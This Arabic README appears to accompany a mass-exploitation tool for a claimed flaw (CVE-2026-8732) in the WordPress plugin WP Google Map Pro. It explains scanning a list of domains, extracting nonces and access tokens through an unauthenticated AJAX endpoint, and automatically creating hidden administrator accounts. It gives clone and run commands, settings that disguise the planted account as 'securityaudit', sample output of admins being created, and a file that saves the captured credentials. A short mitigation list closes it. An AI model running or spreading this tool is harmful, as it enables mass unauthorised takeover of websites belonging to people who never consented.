
ماسح جماعي متعدد الخيوط لثغرة CVE-2026-8732 في إضافة WP Google Map Pro الخاصة بووردبريس. يقوم بأتمتة استخراج الـ nonce، واستغلال التوكن، وإنشاء حساب مدير مخفي على المواقع المعرضة للخطر.
تستغل هذه الأداة CVE-2026-8732، وهي ثغرة في إضافة WP Google Map Pro الخاصة بووردبريس. تسمح الثغرة لمهاجم غير مصادق بالحصول على wpmp_token صالح عبر نقطة نهاية AJAX (admin-ajax.php?action=wpgmp_temp_access_ajax). باستخدام هذا الرمز المميز، يمكن للمهاجم الوصول إلى لوحة تحكم ووردبريس وإنشاء مستخدم مدير جديد.
تقوم الأداة بإجراء مسح شامل من قائمة نطاقات، وتستخرج الـ nonce والرمز المميز، وتنشئ تلقائيًا حساب مدير مخفي على المواقع الضعيفة. تُحفظ النتائج في الوقت الفعلي مع تفاصيل الرمز المميز الكاملة.
| الحقل | القيمة |
|---|---|
| معرف CVE | CVE-2026-8732 (افتراضي لهذه الإضافة) |
| الإضافة المتأثرة | WP Google Map Pro (الإصدارات <= 1.5.0) |
| نوع الثغرة | التحكم المكسور في الوصول / تصعيد الصلاحيات |
| متجه الهجوم | غير مصادق، عن بُعد |
| التأثير | السيطرة الكاملة على الموقع عبر إنشاء حساب مدير |
admin_created.txthttp:// و https://requestsثبّت المكتبة المطلوبة:
pip install requests
🚀 التثبيت
git clone https://github.com/CVE-2026-8732-POC/CVE-2026-8732.git
cd CVE-2026-8732
🎯 الاستخدام
جهّز ملف قائمة الأهداف (نطاق واحد لكل سطر):
example.com
https://target-website.com
http://vulnerable-site.org
شغّل الماسح:
python2 exploit.py targets.txt
ملفات الإخراج
الملف المحتوى res.txt النطاقات الضعيفة مع الرمز المميز الكامل وعنوان إعادة التوجيه (إن وجد) admin_created.txt بيانات اعتماد المدير المُنشأة بنجاح (النطاق، اسم المستخدم، كلمة المرور، البريد الإلكتروني)
مثال على الإخراج
[*] Checking: https://example.com
[VULNERABLE] https://example.com -> Token found
[*] https://example.com -> Accessing redirect URL...
[+] https://example.com -> Admin created: securityaudit_1734567890 / StrongP@ssw0rd123!
⚙️ الإعدادات
عدّل المتغيرات التالية داخل السكربت:
TIMEOUT = 10 # Request timeout in seconds
JUMLAH_THREAD = 10 # Number of concurrent threads
OUTPUT_FILE = "res.txt" # File for vulnerable results
ADMIN_FILE = "admin_created.txt"
BASE_USERNAME = "securityaudit"
NEW_PASSWORD = "StrongP@ssw0rd123!"
NEW_EMAIL = "[email protected]"
🧠 كيف تعمل
🛡️ التخفيف
· حدّث WP Google Map Pro إلى أحدث إصدار مُصحّح. · عطّل إجراء AJAX wpgmp_temp_access_ajax عبر كود مخصص أو جدار حماية. · استخدم جدار حماية تطبيقات الويب (WAF) لحظر الطلبات الضارة الموجهة إلى admin-ajax.php.